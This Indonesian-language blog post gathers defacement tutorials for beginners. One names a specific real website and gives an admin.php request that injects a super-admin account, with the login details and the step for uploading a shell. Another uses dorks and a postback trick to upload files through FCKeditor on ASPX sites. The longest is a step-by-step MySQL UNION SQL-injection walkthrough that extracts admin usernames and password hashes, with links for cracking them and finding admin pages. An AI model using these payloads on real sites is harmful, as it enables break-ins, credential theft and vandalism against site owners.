nah kalo sudah sampe sini saatnya merubah public halaman nya gan
masukin shell agan di preff.situs aja . ,,
selamat mencoba gan ,
ini gan hasilnya : http://www.svgolfinstructor.com/nuke/index.php
http://www.svgolfinstructor.com/nuke/admin.php
http://www.svgolfinstructor.com/nuke/admin.php?op=AddAuthor&add_aid=jundue32&add_name=
God&add_pwd=cobacoba&add_email=
bukanmaviamalam@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox
back to http://www.svgolfinstructor.com/nuke/admin.php
jangan lupa ctrl - ( berulang2 hingga ada tampilan login ) kecil emang , hehe
login
user : jundue32
pass: cobacoba
cari press situs, icon kolom 2 baris 3 .
ubah shell yang paling atas,,
selamat mencoba
referensi :
http://pekanbarucyberteam.forumotion.com/deface-website-nuke-php-n34.htm
***********************************************************
6.Tutorial Deface 4 Newbi
Hmm..Untuk Aspx, Mungkin Tutorial Ini masih cukup berguna....Langsung Coba aja deh ...hihihiih
Langkah-langkah : Dork ->>> inurl:Fck/fcklinkgallery.aspx Atau
inurl:tabid "aspx" site:il Dan Masih Bannyak Lagi ^^
Pilih >> File ( A File On Your Site )
masukin kode ini di URL,trus jalanin
--------------------------- cut here -----------------------------------------
javascript:__doPostBack('ctlURL$cmdUpload','')
-------------------------- end here -----------------------------------------
Ntar muncul browse utk upload file,tgl di upload aja Wink
Oia,file yg bisa di upload antara lain :
*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
*.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg, *.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob
masang shell ? coba aja ^_^
Selamat Mencoba
referensi:
http://pekanbarucyberteam.forumotion.com/tutorial-f11/tutorial-deface-aspx-untuk-pemula-t30.htm#528
************************************************************************
7.Tutorial Deface Untuk Pemula
Sharing Lagi Nih... Tutorial Deface Suatu Web Dengan Munggunakan Sebaik Mungkin Suatu Vuln / Eror Di Suatu Web Site.Langsung Aja ...
Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x
===========
[+]step Satu:=
===========
carilah target
misal: [site]/berita.php?id=100
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100' atau
[site]/berita.php?id=-100
sehingga muncul pesan error seperti berikut ( Masih Banyak Lagi ) :
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1"
==========
[+]step Dua:=
==========
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by
contoh: [site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*
ceklah secara step by step (satupersatu)...
misal: [site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--
sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--
berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--
===========
[+]step Tiga:=
===========
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--
ok seumpama yg keluar angka 5
gunakan perintah version() atau @@version untuk mengecek
versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--
lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..
============
[+]step Empat:=
============
untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--
seumpama table yang muncul adalah "admin"
===========
[+]step Lima:=
===========
untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--
=============
[+] step Enam: =
=============
perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :
www.ascii-convert.co.cc
contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--
============
=step Tujuh:=
============
memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--
contoh kata yang keluar adalah id,username,password
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--
Nah, nanti akan ada beberapa password yang sudah di encrypt. jadi butuh decrtypt dulu ini membuka encrypt password nya
Decrypt password Disini : http://www.hashchecker.de/
==============
[+] step Delapan:=
==============
tahap terakhir mencari halam admin atau login
Link : http://th3-0utl4ws.com/tools/admin-finder/index.php
Nah Demikian Tutorial Yang Bisa Saya Share, Semoga Bisa Bermanfaat dan Bisa Menjadi Dasar Dari Seorang Defacer :)
Referensi:
http://prorebell.blogspot.com/2010/09/tutorial-deface-untuk-pemula.html
![[Valid Atom 1.0]](valid-atom.png "Validate my Atom 1.0 feed")
Tidak ada komentar:
Posting Komentar